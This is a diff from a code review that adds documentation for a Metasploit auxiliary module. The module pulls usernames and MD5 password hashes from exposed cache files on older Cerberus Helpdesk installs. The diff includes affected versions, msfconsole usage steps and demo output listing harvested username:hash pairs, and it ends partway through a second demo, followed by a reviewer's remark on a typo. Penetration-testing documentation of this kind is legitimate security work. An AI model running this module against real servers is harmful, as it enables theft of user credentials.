documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md

```diff
@@ -0,0 +1,61 @@
+## Description
+
+This module opens a `devblocks_cache---ch_workers` or `zend_cache---ch_workers` file which contains a
+data structure with username and password hash (MD5) credentials.  The contents looks similar to JSON, however it is not.
+
+## Vulnerable Application
+
+This module has been verified against:
+
+1. Version 4.2.3 Stable (Build 925)
+2. Version 5.4.4
+
+However it may also work up to, but no including, version 6.7
+
+Version 5.4.4 is available on [exploit-db.com](https://www.exploit-db.com/apps/882596e791e54529b29ecbc6f48a6cb7-cerb5-5_4_4.zip)
+
+* of note, 5.4.4 has to be installed on a PRE php7 environment.
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gather/cerberus_helpdesk_hash_disclosure```
+3. ```set rhosts```
+4. ```run```
+
+## Demo
+
+### 4.2.3 using zend (not verbose)
+
+  ```
+    msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
+    rhosts => 1.1.1.1
+    msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
+    
+    [-] Invalid response received for /storage/tmp/devblocks_cache---ch_workers
+    [+] admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
+    [+] example:112302c209fe8d73f502c132a3da2b1c
+    [+] foobar:0d108d09e5bbe40aade3de5c81e9e9c7
+  ```
+
+### 5.4.4 using devblocks
+
+  ```
+    msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure 
+    rhost => 192.168.2.45
```

Comment:
when you type it wrong and then remove only the FIRST line of your embarrassment :).